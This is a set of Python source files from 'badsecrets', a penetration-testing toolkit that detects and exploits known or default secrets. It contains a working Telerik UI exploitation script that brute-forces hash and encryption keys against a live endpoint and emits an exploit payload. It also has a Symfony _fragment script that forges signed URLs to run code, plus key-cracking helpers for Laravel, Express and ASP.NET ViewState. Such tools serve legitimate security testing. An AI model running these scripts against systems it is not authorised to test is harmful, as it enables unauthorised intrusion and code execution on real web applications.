#!/usr/bin/env python3
# badsecrets - Telerik UI known key exploitation tool
# Black Lantern Security - https://www.blacklanternsecurity.com
# @paulmmueller

import os
import re
import sys
import base64
import urllib.parse
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.dirname(SCRIPT_DIR))

from badsecrets import modules_loaded

Telerik_HashKey = modules_loaded["telerik_hashkey"]
Telerik_EncryptionKey = modules_loaded["telerik_encryptionkey"]

telerik_versions = [
    "2022.3.1109",
    "2022.3.913",
    "2022.2.622",
    "2022.2.511",
    "2022.1.302",
    "2022.1.119",
    "2021.3.1111",
    "2021.3.914",
    "2021.2.616",
    "2021.2.511",
    "2021.1.330",
    "2021.1.224",
    "2021.1.119",
    "2020.3.1021",
    "2020.3.915",
    "2020.2.617",
    "2020.2.512",
    "2020.1.219",
    "2020.1.114",
    "2019.3.1023",
    "2019.3.917",
    "2019.2.514",
    "2019.1.215",
    "2019.1.115",
    "2018.3.910",
    "2018.2.710",
    "2018.2.516",
    "2018.1.117",
]


def probe_version(
    url, hash_key, encryption_key, version, key_derive_mode, telerik_hashkey, telerik_encryptionkey, proxies
):
    b64section_plain = f"Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version={version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4"
    b64section = base64.b64encode(b64section_plain.encode()).decode()
    plaintext = f"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,{b64section};AllowMultipleSelection,False,3,False"
    derivedKey, derivedIV = telerik_encryptionkey.telerik_derivekeys(encryption_key, key_derive_mode)
    ct = telerik_encryptionkey.telerik_encrypt(derivedKey, derivedIV, plaintext)
    dialog_parameters = telerik_hashkey.sign_enc_dialog_params(hash_key, ct)
    dialog_parameters_data = {"dialogParametersHolder": dialog_parameters}
    r = requests.post(url, data=dialog_parameters_data, verify=False, proxies=proxies)
    if r.status_code == 200:
        return dialog_parameters


def validate_url(
    arg_value,
    pattern=re.compile(
        r"^https?://((?:[A-Z0-9_]|[A-Z0-9_][A-Z0-9\-_]*[A-Z0-9_])[\.]?)+(?:[A-Z0-9_][A-Z0-9\-_]*[A-Z0-9_]|[A-Z0-9_])(?::[0-9]{1,5})?.*$",
        re.IGNORECASE,
    ),
):
    if not pattern.match(arg_value):
        raise argparse.ArgumentTypeError("URL is not formatted correctly")
    return arg_value


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        "--url",
        type=validate_url,
        help="The URL of the page to access and attempt to pull viewstate and generator from",
        required=True,
    )

    parser.add_argument(
        "-p",
        "--proxy",
        help="Optionally specify an HTTP proxy",
    )

    parser.add_argument(
        "-a",
        "--user-agent",
        help="Optionally set a custom user-agent",
    )

    parser.add_argument(
        "-m", "--machine-keys", help="Optionally include ASP.NET MachineKeys when loading keys", action="store_true"
    )

    args = parser.parse_args()

    if not args.url:
        return

    include_machinekeys_bool = False
    if args.machine_keys:
        include_machinekeys_bool = True
        print("MachineKeys inclusion enabled. Bruteforcing will take SIGNIFICANTLY longer")

    proxies = None
    if args.proxy:
        proxies = {"http": args.proxy, "https": args.proxy}

    headers = {}
    if args.user_agent:
        headers["User-agent"] = args.user_agent

    try:
        res = requests.get(args.url, proxies=proxies, headers=headers, verify=False)
    except (requests.exceptions.ConnectionError, requests.exceptions.ConnectTimeout):
        print(f"Error connecting to URL: [{args.url}]")
        return
    resp_body = urllib.parse.unquote(res.text)
    if "Loading the dialog..." not in resp_body:
        print(f"URL does not appear to be a Telerik UI DialogHandler")
        return

    key_derive_mode = "PBKDF1_MS"
    KDF_probe_data = {"dialogParametersHolder": "AAAA"}
    res = requests.post(args.url, data=KDF_probe_data, proxies=proxies, headers=headers, verify=False)
    resp_body = res.text

    if "Exception of type 'System.Exception' was thrown" in resp_body:
        key_derive_mode = "PBKDF2"
        print(
            "Target is a newer version of Telerik UI without verbose error messages. Hash key and Encryption key will have to BOTH match. PBKDF2 key derivation is used."
        )
    elif "Length cannot be less than zero" in resp_body:
        key_derive_mode = "PBKDF1_MS"
        print(
            "Target is post-CVE-2017-9248 patched but old enough to use older PBKDF1_MS key dervivation. Hash key can be solved independently."
        )
    else:
        print("Unexpected response encountered, aborting.")
        return

    print("Target is a valid DialogHandler endpoint. Brute forcing Telerik Hash Key...")

    found_hash_key = False
    found_encryption_key = False
    x = Telerik_HashKey()
    y = Telerik_EncryptionKey()

    # PBKDF1_MS MODE
    if key_derive_mode == "PBKDF1_MS":
        hashkey_counter = 0
        for hash_key_probe, hash_key in x.hashkey_probe_generator(include_machinekeys=include_machinekeys_bool):
            hashkey_counter += 1
            data = {"dialogParametersHolder": hash_key_probe}
            res = requests.post(args.url, data=data, proxies=proxies, headers=headers, verify=False)
            resp_body = urllib.parse.unquote(res.text)

            if hashkey_counter % 1000 == 0:
                print(f"Tested {str(hashkey_counter)} hash keys so far...")

            if "The input data is not a complete block" in resp_body:
                print(f"Found matching hashkey! [{hash_key}]")
                found_hash_key = True
                break
            elif "The hash is not valid!" in resp_body:
                continue

            elif "The input is not a valid Base-64 string" in resp_body:
                print("The target appears to be a pre-2017 version, and does not have a hash key.")
                print("This means it should be vulnerable to CVE-2017-9248!!!")
                return

        if found_hash_key:
            print("Since we found a valid hash key, we can check for known Telerik Encryption Keys")

            encryptionkey_counter = 0
            for encryption_key_probe, encryption_key in y.encryptionkey_probe_generator(
                hash_key, key_derive_mode, include_machinekeys=include_machinekeys_bool
            ):
                encryptionkey_counter += 1
                data = {"dialogParametersHolder": encryption_key_probe}
                res = requests.post(args.url, data=data, proxies=proxies, headers=headers, verify=False)

                if encryptionkey_counter % 1000 == 0:
                    print(f"Tested {str(encryptionkey_counter)} encryption keys so far...")
                if "Index was outside the bounds of the array" in res.text:
                    print(f"Found Encryption key! [{encryption_key}]")
                    found_encryption_key = True
                    break

            if found_encryption_key == False:
                print("Could not identify encryption key.")
                return
        else:
            print("Count not identify hash key.")
            return

    elif key_derive_mode == "PBKDF2":
        if include_machinekeys_bool:
            print(
                "Warning: MachineKeys inclusion mode is enabled, which affects this Telerik version particularly dramatically. Brute Forcing will be VERY SLOW"
            )
            print("Try without the MachineKeys first!")
        print("About to bruteforce hash key and encryption key combinations...")
        count = 0
        for hash_key in x.prepare_keylist(include_machinekeys=include_machinekeys_bool):
            for encryption_key_probe, encryption_key in y.encryptionkey_probe_generator(
                hash_key, key_derive_mode, include_machinekeys=include_machinekeys_bool
            ):
                count += 1
                data = {"dialogParametersHolder": encryption_key_probe}
                res = requests.post(args.url, data=data, proxies=proxies, headers=headers, verify=False)
                if "Index was outside the bounds of the array" in res.text:
                    print(f"Found Encryption key! [{encryption_key}]")
                    print(f"Found matching hashkey! [{hash_key}]")
                    found_hash_key = True
                    found_encryption_key = True
                    break
                if count % 1000 == 0:
                    print(f"Tested {str(count)} hash key / encryption key combinations so far...")

            if found_hash_key:
                break

    if found_hash_key and found_encryption_key:
        print(
            "Both encryption key and hash key were found: attempting to brute-force Telerik UI version and generate exploitation payload"
        )

        versions = []
        for v in telerik_versions:
            versions.append(v)
        undotted_versions = []
        for v in telerik_versions:
            undotted_versions.append(re.sub(r"\.(?=\d+$)", "", v))
        versions += undotted_versions

        for version in versions:
            dialog_parameters = probe_version(
                args.url, hash_key, encryption_key, version, key_derive_mode, x, y, proxies
            )
            if dialog_parameters:
                print(f"Found Telerik Version! [{version}]")
                print("Submit a POST request, with dialogParametersHolder POST parameter set to this value")
                print("Then use Burp Suite to replay the request in the browser")
                print("Dialog Parameters Exploit Value:")
                print(urllib.parse.quote_plus(dialog_parameters))
                return

    else:
        print("Did not find hashkey / encryption key. Exiting.")


if __name__ == "__main__":
    print("badsecrets - Telerik UI known key exploitation tool\n")
    main()



import sys
import hmac
import struct
import hashlib
from badsecrets.errors import BadsecretsException


def _writeuint(v):
    return struct.pack(">I", v)


def unpad(s):
    return s[: -ord(s[len(s) - 1 :])]


def sp800_108_derivekey(key, label, context, keyLengthInBits):
    lblcnt = 0 if label is None else len(label)
    ctxcnt = 0 if context is None else len(context)
    buffer = b"\x00" * (4 + lblcnt + 1 + ctxcnt + 4)
    if lblcnt != 0:
        buffer = buffer[:4] + label + buffer[4 + lblcnt :]
    if ctxcnt != 0:
        buffer = buffer[: 5 + lblcnt] + context + buffer[5 + lblcnt + ctxcnt :]
    buffer = buffer[: 5 + lblcnt + ctxcnt] + _writeuint(keyLengthInBits) + buffer[5 + lblcnt + ctxcnt + 4 :]
    v = int(keyLengthInBits / 8)
    res = b"\x00" * v
    num = 1
    while v > 0:
        buffer = _writeuint(num) + buffer[4:]
        h = hmac.new(key, buffer, hashlib.sha512)
        hash = h.digest()
        cnt = min(v, len(hash))
        res = hash[:cnt] + res[cnt:]
        v -= cnt
        num += 1
    return res


def write_vlq_string(string):
    encoded_string = string.encode("utf-8")
    length = len(encoded_string)
    length_vlq = bytearray()
    while length >= 0x80:
        length_vlq.append((length | 0x80) & 0xFF)
        length >>= 7
    length_vlq.append(length)
    return bytes(length_vlq) + encoded_string


def sp800_108_get_key_derivation_parameters(primary_purpose, specific_purposes):
    derived_key_label = primary_purpose.encode("utf-8")
    derived_key_context = b"".join([write_vlq_string(purpose) for purpose in specific_purposes])
    return derived_key_label, derived_key_context


class Csharp_pbkdf1_exception(BadsecretsException):
    pass


class Csharp_pbkdf1:
    def __init__(self, passwordBytes, saltBytes, iterations):
        self.passwordBytes = passwordBytes
        self.saltBytes = saltBytes
        self.iterations = iterations
        self.extra = bytes([])
        self.extra_count = 0
        self.magic_number = 0
        if not iterations > 0:
            raise Csharp_pbkdf1_exception("Iterations must be greater than 0")

        try:
            self.lasthash = hashlib.sha1(passwordBytes + saltBytes).digest()
        except TypeError:
            raise Csharp_pbkdf1_exception("Password and Salt must be of type bytes")

        self.iterations -= 1

        for i in range(self.iterations - 1):
            self.lasthash = hashlib.sha1(self.lasthash).digest()

        self.derivedBytes = hashlib.sha1(self.lasthash).digest()
        self.ctrl = 1

    def GetBytes(self, keylen):
        if not isinstance(keylen, int):
            raise Csharp_pbkdf1_exception("GetBytes() must be called with an int")

        result = bytearray()

        if len(self.extra) > 0:
            self.magic_number = len(self.extra) - self.extra_count
            if self.magic_number >= keylen:
                result.extend(self.extra[self.extra_count : self.extra_count + keylen])
                if self.magic_number > keylen:
                    self.extra_count += keylen
                else:
                    self.extra = bytes([])
                self.derivedBytes = bytes([])
                return result

            result.extend(self.extra[self.magic_number : self.magic_number + self.magic_number])
            self.extra = bytes([])

        while len(self.derivedBytes) < keylen:
            self.derivedBytes += hashlib.sha1(bytes([ord(str(self.ctrl))]) + self.lasthash).digest()
            self.ctrl += 1

        result.extend(self.derivedBytes[: keylen - self.magic_number])

        if (len(self.derivedBytes) + self.magic_number) > keylen:
            self.extra = self.derivedBytes
            self.extra_count = keylen - self.magic_number

        self.derivedBytes = bytes([])
        return result


def twos_compliment(unsigned):
    bs = bin(unsigned).replace("0b", "")
    val = int(bs, 2)
    b = val.to_bytes(1, byteorder=sys.byteorder, signed=False)
    return int.from_bytes(b, byteorder=sys.byteorder, signed=True)


class Java_sha1prng:
    def __init__(self, key):
        keyBytes = key
        if not isinstance(key, bytes):
            keyBytes = key.encode()

        self.seed = hashlib.sha1(keyBytes).digest()
        self.state = None
        self.outBytes = b""

        # Simulate setseed()
        self.state = hashlib.sha1(self.seed).digest()
        self.outBytes = hashlib.sha1(self.state).digest()
        self.updateState(self.outBytes)

    def updateState(self, output):
        last = 1
        outputBytesArray = bytearray(output)
        newState = bytearray()

        for c, n in zip(self.state, outputBytesArray):
            v = twos_compliment(c) + twos_compliment(n) + last
            finalv = v & 255
            newState.append(finalv)
            last = v >> 8
        self.state = newState

    def get_sha1prng_key(self, outLen):
        while len(self.outBytes) < outLen:
            output = hashlib.sha1(self.state).digest()
            self.outBytes += output
            self.updateState(output)
        return self.outBytes[:outLen]



import re
import json
import hashlib
import hmac
import base64
import binascii
import urllib.parse
from Crypto.Cipher import AES
from contextlib import suppress
from badsecrets.helpers import unpad
from badsecrets.base import BadsecretsBase


class LaravelSignedCookies(BadsecretsBase):
    def laravelDecrypt(self, json_value, raw_secret):
        mac = json_value["mac"]
        value = bytes(json_value["value"], "utf-8")
        iv = bytes(json_value["iv"], "utf-8")

        if mac == hmac.new(raw_secret, iv + value, hashlib.sha256).hexdigest():
            aes_crypt = AES.new(key=raw_secret, mode=AES.MODE_CBC, IV=base64.b64decode(iv))
            decrypted = unpad(aes_crypt.decrypt(base64.b64decode(value)))
            return decrypted
        return None

    identify_regex = re.compile(r"eyJ(?:[\w-])*")
    description = {"product": "Laravel Signed Cookie", "secret": "Laravel APP_KEY", "severity": "HIGH"}

    def laravelVerify(self, value, secret):
        # attempt to decode laravel cookie and load contents into JSON object
        try:
            json_value = json.loads(base64.b64decode(urllib.parse.unquote(value)))

            if not all(key in json_value.keys() for key in ["mac", "value", "iv"]):
                return False

        except (binascii.Error, json.decoder.JSONDecodeError, UnicodeDecodeError):
            return False

        # in the future, support may be added for older, non-base64 keys
        if secret.startswith("base64:"):
            with suppress(binascii.Error):
                raw_secret = base64.b64decode(secret.split(":")[1])
                decryptedData = self.laravelDecrypt(json_value, raw_secret)
                if decryptedData:
                    return {"decryptedData": decryptedData.decode()}
        return False

    def check_secret(self, laravel_signed_cookie):
        if not self.identify(laravel_signed_cookie):
            return None

        for l in self.load_resources(["laravel_app_keys.txt"]):
            app_key = l.rstrip()
            r = self.laravelVerify(value=laravel_signed_cookie, secret=app_key)
            if r:
                return {"secret": app_key, "details": r}
        return None



import re
import hmac
import base64
import binascii
import urllib.parse
from contextlib import suppress
from badsecrets.base import BadsecretsBase


def no_padding_urlsafe_base64_decode(enc):
    return base64.urlsafe_b64decode(enc + "=" * (-len(enc) % 4))


def no_padding_urlsafe_base64_encode_es(enc):
    return base64.urlsafe_b64encode(enc).decode().rstrip("=").replace("-", "+").replace("_", "/")


class ExpressSignedCookies_ES(BadsecretsBase):
    identify_regex = re.compile(r"^s%3[Aa][^\.]+\.[a-zA-Z0-9%]{20,90}$")
    description = {
        "product": "Express.js Signed Cookie (express-session)",
        "secret": "Express.js SESSION_SECRET (express-session)",
        "severity": "LOW",
    }

    def carve_regex(self):
        return re.compile(r"(s%3[Aa][^\.]+\.[a-zA-Z0-9%]{20,90})")

    def expressHMAC(self, payload, secret, hash_algorithm):
        return no_padding_urlsafe_base64_encode_es(
            hmac.HMAC(secret.encode(), payload.encode(), hash_algorithm).digest()
        )

    def expressVerify_es(self, value, secret):
        payload, signature = value.split(".")[0][4:], urllib.parse.unquote(value.split(".")[1])

        with suppress(binascii.Error):
            signature_candidates = self.search_dict(self.hash_sizes, len(no_padding_urlsafe_base64_decode(signature)))
            if not signature_candidates:
                return False
            else:
                for hash_algorithm_str in signature_candidates:
                    hash_algorithm = self.hash_algs[hash_algorithm_str]
                    generated_hash = self.expressHMAC(payload, secret, hash_algorithm)
                    if generated_hash == signature:
                        return {
                            "hash algorithm": hash_algorithm.__name__.split("openssl_")[1],
                        }
        return False

    def check_secret(self, express_signed_cookie):
        if not self.identify(express_signed_cookie):
            return False

        for l in set(list(self.load_resources(["express_session_secrets.txt", "top_10000_passwords.txt"]))):
            session_secret = l.rstrip()

            r = self.expressVerify_es(express_signed_cookie, session_secret)

            if r:
                return {"secret": session_secret, "details": r}



#!/usr/bin/env python3
# badsecrets - Symfony _fragment known secret key brute-force tool
# Black Lantern Security - https://www.blacklanternsecurity.com
# @paulmmueller

import re
import os
import sys
import hashlib
import argparse
import requests
from contextlib import suppress
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.dirname(SCRIPT_DIR))

from badsecrets import modules_loaded

Symfony_SignedURL = modules_loaded["symfony_signedurl"]


def validate_url(
    arg_value,
    pattern=re.compile(
        r"^https?://((?:[A-Z0-9_]|[A-Z0-9_][A-Z0-9\-_]*[A-Z0-9_])[\.]?)+(?:[A-Z0-9_][A-Z0-9\-_]*[A-Z0-9_]|[A-Z0-9_])(?::[0-9]{1,5})?.*$",
        re.IGNORECASE,
    ),
):
    if not pattern.match(arg_value):
        raise argparse.ArgumentTypeError("URL is not formatted correctly")
    return arg_value


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        "--url",
        type=validate_url,
        help="The URL of the page to access and attempt to pull viewstate and generator from",
        required=True,
    )

    parser.add_argument(
        "-p",
        "--proxy",
        help="Optionally specify an HTTP proxy",
    )

    parser.add_argument(
        "-a",
        "--user-agent",
        help="Optionally set a custom user-agent",
    )

    args = parser.parse_args()

    if not args.url:
        return

    proxies = None
    if args.proxy:
        proxies = {"http": args.proxy, "https": args.proxy}

    headers = {}
    if args.user_agent:
        headers["User-agent"] = args.user_agent

    fragment_test_url = f"{args.url.rstrip('/')}/_fragment"
    try:
        res_fragment = requests.get(f"{fragment_test_url}", proxies=proxies, headers=headers, verify=False)
    except (requests.exceptions.ConnectionError, requests.exceptions.ConnectTimeout):
        print(f"Error connecting to URL: [{args.url}]")
        return

    negative_test_url = f"{args.url.rstrip('/')}/AAAAAAAA"
    res_random = requests.get(f"{negative_test_url}", proxies=proxies, headers=headers, verify=False)

    if (res_fragment.status_code != 403) or not (res_random.status_code != res_fragment.status_code):
        print(f"Not a Symfony app, or _fragment functionality not enabled...")
        return

    print("Target appears to by a Symfony app with _fragment enabled. Brute forcing Symfony secret...")

    x = Symfony_SignedURL()

    phpinfo_test_url = f"{args.url.rstrip('/')}/_fragment?_path=_controller%3Dphpcredits"

    for l in x.load_resources(["symfony_appsecret.txt"]):
        with suppress(ValueError):
            secret = l.rstrip()
            for hash_algorithm in [hashlib.sha256, hashlib.sha1]:
                hash_value = x.symfonyHMAC(phpinfo_test_url, secret, hash_algorithm)
                test_url = f"{phpinfo_test_url}&_hash={hash_value.decode()}"
                test_res = requests.get(f"{test_url}", proxies=proxies, headers=headers, verify=False)
                if "PHP Authors" in test_res.text:
                    print(test_url)
                    print(f"Found Symfony Secret! [{secret}]")
                    print(f"PoC URL: {test_url}")
                    print(f"Hash Algorithm: {hash_algorithm.__name__.split('_')[1]}")
                    return


if __name__ == "__main__":
    print("badsecrets - Symfony _fragment known secret key brute-force tool\n")
    main()



import re
import hmac
import base64
import binascii
import urllib.parse
from contextlib import suppress
from badsecrets.base import BadsecretsBase


class Telerik_HashKey(BadsecretsBase):
    identify_regex = re.compile(r"^(?:[A-Za-z0-9+\/=%]{32,})$")
    description = {
        "product": "Telerik DialogParameters",
        "secret": "Telerik.Upload.ConfigurationHashKey",
        "severity": "HIGH",
    }

    def carve_regex(self):
        return re.compile(r"{\"SerializedParameters\":\"([^\"]*)\"")

    def prepare_keylist(self, include_machinekeys=True):
        if include_machinekeys:
            for l in self.load_resources(["aspnet_machinekeys.txt"]):
                try:
                    vkey, ekey = l.rstrip().split(",")
                    yield vkey
                except ValueError:
                    continue
        for l in self.load_resources(["telerik_hash_keys.txt"]):
            vkey = l.strip()
            yield vkey

    @classmethod
    def telerik_hashkey_load(self, dialogParameters_raw):
        dialogParametersB64 = urllib.parse.unquote(dialogParameters_raw)
        return dialogParametersB64[:-44].encode(), dialogParametersB64[-44:].encode()

    def check_secret(self, dialogParameters_raw):
        if not self.identify(dialogParameters_raw):
            return None

        dp_enc, dp_hash = self.telerik_hashkey_load(dialogParameters_raw)

        for vkey in self.prepare_keylist():
            with suppress(binascii.Error):
                h = hmac.new(vkey.encode(), dp_enc, self.hash_algs["SHA256"])
                if base64.b64encode(h.digest()) == dp_hash:
                    return {"secret": vkey, "details": None}
        return None

    def get_hashcat_commands(self, dialogParameters_raw, *args):
        dp_enc, dp_hash = self.telerik_hashkey_load(dialogParameters_raw)
        if not dp_enc or not dp_hash:
            return None

        try:
            dp_enc_decoded = base64.b64decode(dp_hash)
            dp_hash_decoded = base64.b64decode(dp_enc)
        except binascii.Error:
            return None

        return [
            {
                "command": f"hashcat -m 1450 -a 0 {dp_enc_decoded.hex()}:{dp_hash_decoded.hex()} --hex-salt <dictionary_file>",
                "description": f"Telerik Hash Key Signature",
            }
        ]

    def hashkey_probe_generator(self, include_machinekeys=False):
        test_string = b"EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmk4dUx3PT0sZmk4dUx3PT0=;IsSkinTouch,False,3,False;ScriptManagerProperties,False,0,CgoKCkZhbHNlCjAKCgoK;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,VGVsZXJpay5XZWIuVUkuRWRpdG9yLkRpYWxvZ0NvbnRyb2xzLkRvY3VtZW50TWFuYWdlckRpYWxvZywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxOC4xLjExNy40NSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0;AllowMultipleSelection,False,3,False"
        dp_enc = base64.b64encode(test_string)
        for vkey in self.prepare_keylist(include_machinekeys=include_machinekeys):
            h = hmac.new(vkey.encode(), dp_enc, self.hash_algs["SHA256"])
            yield (f"{dp_enc.decode()}{base64.b64encode(h.digest()).decode()}", vkey)

    def sign_enc_dialog_params(self, hash_key, enc_dialog_params):
        dp_enc = enc_dialog_params.encode()
        h = hmac.new(hash_key.encode(), dp_enc, self.hash_algs["SHA256"])
        return f"{dp_enc.decode()}{base64.b64encode(h.digest()).decode()}"



import re
import hmac
import struct
import base64
import hashlib
import binascii
from Crypto.Cipher import AES
from Crypto.Cipher import DES
from Crypto.Cipher import DES3
from viewstate import ViewState
from contextlib import suppress
from urllib.parse import urlsplit, urlparse
from badsecrets.helpers import unpad, sp800_108_derivekey, sp800_108_get_key_derivation_parameters
from viewstate.exceptions import ViewStateException
from badsecrets.base import BadsecretsBase, generic_base64_regex


class ASPNET_Viewstate(BadsecretsBase):
    check_secret_args = 3
    identify_regex = generic_base64_regex
    description = {"product": "ASP.NET Viewstate", "secret": "ASP.NET MachineKey", "severity": "CRITICAL"}

    def carve_regex(self):
        return re.compile(
            r"<input.+__VIEWSTATE\"\svalue=\"(.+)\"[\S\s]+<input.+__VIEWSTATEGENERATOR\"\svalue=\"(\w+)\""
        )

    def carve_to_check_secret(self, s, url=None):
        if len(s.groups()) == 2:
            r = self.check_secret(s.groups()[0], s.groups()[1], url)
            return r

    @staticmethod
    def valid_preamble(sourcebytes):
        if sourcebytes[0:2] == b"\xff\x01":
            return True
        return False

    def viewstate_decrypt(self, ekey_bytes, hash_alg, viewstate_B64, url, mode):
        viewstate_bytes = base64.b64decode(viewstate_B64)

        vs_size = len(viewstate_bytes)
        dec_algos = set()
        hash_size = self.hash_sizes[hash_alg]

        if (vs_size - hash_size) % AES.block_size == 0:
            dec_algos.add("AES")
        if (vs_size - hash_size) % DES.block_size == 0:
            dec_algos.add("DES")
            dec_algos.add("3DES")
        for dec_algo in list(dec_algos):
            with suppress(ValueError):
                if dec_algo == "AES":
                    block_size = AES.block_size
                    iv = viewstate_bytes[0:block_size]
                    if mode == "DOTNET45" and url:
                        s = Simulate_dotnet45_kdf_context_parameters(url)
                        label, context = sp800_108_get_key_derivation_parameters(
                            "WebForms.HiddenFieldPageStatePersister.ClientState", s.get_specific_purposes()
                        )
                        ekey_bytes = sp800_108_derivekey(ekey_bytes, label, context, (len(ekey_bytes) * 8))
                    cipher = AES.new(ekey_bytes, AES.MODE_CBC, iv)
                    blockpadlen_raw = len(ekey_bytes) % AES.block_size
                    if blockpadlen_raw == 0:
                        blockpadlen = block_size
                    else:
                        blockpadlen = blockpadlen_raw

                elif dec_algo == "3DES":
                    block_size = DES3.block_size
                    iv = viewstate_bytes[0:block_size]
                    cipher = DES3.new(ekey_bytes[:24], DES3.MODE_CBC, iv)
                    blockpadlen = 16

                elif dec_algo == "DES":
                    block_size = DES.block_size
                    iv = viewstate_bytes[0:block_size]
                    cipher = DES.new(ekey_bytes[:8], DES.MODE_CBC, iv)
                    blockpadlen = 0

                encrypted_raw = viewstate_bytes[block_size:-hash_size]
                decrypted_raw = cipher.decrypt(encrypted_raw)

                with suppress(TypeError):
                    if mode == "DOTNET45":
                        decrypt = unpad(decrypted_raw)
                    else:
                        decrypt = unpad(decrypted_raw[blockpadlen:])

                    if self.valid_preamble(decrypt):
                        return dec_algo
                    else:
                        continue

    def viewstate_validate(self, vkey_bytes, encrypted, viewstate_B64, generator, url, mode):
        original_vkey_bytes = vkey_bytes
        viewstate_bytes = base64.b64decode(viewstate_B64)

        if encrypted:
            candidate_hash_algs = list(self.hash_sizes.keys())
        else:
            vs = ViewState(viewstate_B64)
            try:
                vs.decode()
            except ViewStateException:
                return None
            signature_len = len(vs.signature)
            candidate_hash_algs = self.search_dict(self.hash_sizes, signature_len)

        for hash_alg in candidate_hash_algs:
            vkey_bytes = original_vkey_bytes
            viewstate_data = viewstate_bytes[: -self.hash_sizes[hash_alg]]
            signature = viewstate_bytes[-self.hash_sizes[hash_alg] :]
            if hash_alg == "MD5":
                md5_bytes = viewstate_data + vkey_bytes
                if not encrypted:
                    md5_bytes += b"\x00" * 4
                h = hashlib.md5(md5_bytes)
            else:
                vs_data_bytes = viewstate_data
                if not encrypted:
                    vs_data_bytes += generator
                if mode == "DOTNET45" and url:
                    s = Simulate_dotnet45_kdf_context_parameters(url)
                    label, context = sp800_108_get_key_derivation_parameters(
                        "WebForms.HiddenFieldPageStatePersister.ClientState", s.get_specific_purposes()
                    )
                    vkey_bytes = sp800_108_derivekey(vkey_bytes, label, context, (len(vkey_bytes) * 8))
                h = hmac.new(
                    vkey_bytes,
                    vs_data_bytes,
                    self.hash_algs[hash_alg],
                )

            if h.digest() == signature:
                return hash_alg

        return None

    def resolve_args(self, args):
        url_pattern = re.compile(r"http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+")
        generator_pattern = re.compile(r"^[A-F0-9]{8}$")

        url = None
        generator = "0000"

        for arg in args:
            if arg:
                if generator_pattern.match(arg):
                    generator = arg
                elif url_pattern.match(arg):
                    url = arg

        # Remove query string from the URL, if any
        if url:
            url = urlsplit(url)._replace(query="").geturl()
        return generator, url

    def check_secret(self, viewstate_B64, *args):
        generator, url = self.resolve_args(args)

        if not self.identify(viewstate_B64):
            return None

        generator = struct.pack("<I", int(generator, 16))

        if self.valid_preamble(base64.b64decode(viewstate_B64)):
            encrypted = False
        else:
            encrypted = True

        for l in self.load_resources(["aspnet_machinekeys.txt"]):
            try:
                vkey, ekey = l.rstrip().split(",")
            except ValueError:
                continue
            with suppress(ValueError):
                confirmed_ekey = None
                decryptionAlgo = None

                for mode in ["DOTNET40", "DOTNET45"]:
                    validationAlgo = self.viewstate_validate(
                        binascii.unhexlify(vkey), encrypted, viewstate_B64, generator, url, mode
                    )
                    if validationAlgo:
                        if encrypted:
                            with suppress(binascii.Error):
                                ekey_bytes = binascii.unhexlify(ekey)
                                decryptionAlgo = self.viewstate_decrypt(
                                    ekey_bytes, validationAlgo, viewstate_B64, url, mode
                                )
                                if decryptionAlgo:
                                    confirmed_ekey = ekey

                        result = f"validationKey: {vkey} validationAlgo: {validationAlgo}"
                        if confirmed_ekey:
                            result += f" encryptionKey: {confirmed_ekey} encryptionAlgo: {decryptionAlgo}"

                        product_string = f"Viewstate: {viewstate_B64}"
                        if generator != "0000":
                            product_string += f" Generator: {generator[::-1].hex().upper()}"
                        return {"secret": result, "product": product_string, "details": f"Mode [{mode}]"}
        return None


# Based on https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Plugins/ViewStatePlugin.cs and translated to python. All credit to ysoserial.net.
class Simulate_dotnet45_kdf_context_parameters:
    def __init__(self, url):
        self.url = url

    def simulate_template_source_directory(self, str_path):
        str_path = str_path if str_path.startswith("/") else "/" + str_path
        path_parts = str_path.split("/")
        str_path = "/".join(path_parts[:-1]) if "." in path_parts[-1] else str_path
        str_path = self.remove_slash_from_path_if_needed(str_path)
        return str_path if str_path else "/"

    @staticmethod
    def remove_slash_from_path_if_needed(path):
        return path[:-1] if path and path.endswith("/") else path

    def simulate_get_type_name(self, str_path, iis_app_in_path):
        str_path = str_path if str_path.startswith("/") else "/" + str_path
        iis_app_in_path = (
            "/" + iis_app_in_path.lower() if not iis_app_in_path.lower().startswith("/") else iis_app_in_path.lower()
        )
        str_path = str_path + "/default.aspx" if not str_path.lower().endswith(".aspx") else str_path
        iis_app_in_path = iis_app_in_path + "/" if not iis_app_in_path.endswith("/") else iis_app_in_path
